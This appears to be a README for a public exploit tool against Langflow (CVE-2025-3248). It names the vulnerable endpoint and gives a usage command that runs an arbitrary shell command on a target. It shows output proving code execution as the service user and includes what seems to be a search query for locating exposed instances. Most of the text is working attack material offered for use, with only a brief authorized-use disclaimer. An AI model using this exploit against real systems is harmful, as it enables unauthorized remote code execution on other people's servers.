
CVE-2025-3248 Langflow RCE Exploit
Remote Code Execution (RCE) exploit for Langflow applications vulnerable to CVE-2025-3248.
Affected Endpoint:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() in user-controlled code pathapp="Langflow"
This tool is for educational and authorized security testing purposes only. Unauthorized use is prohibited.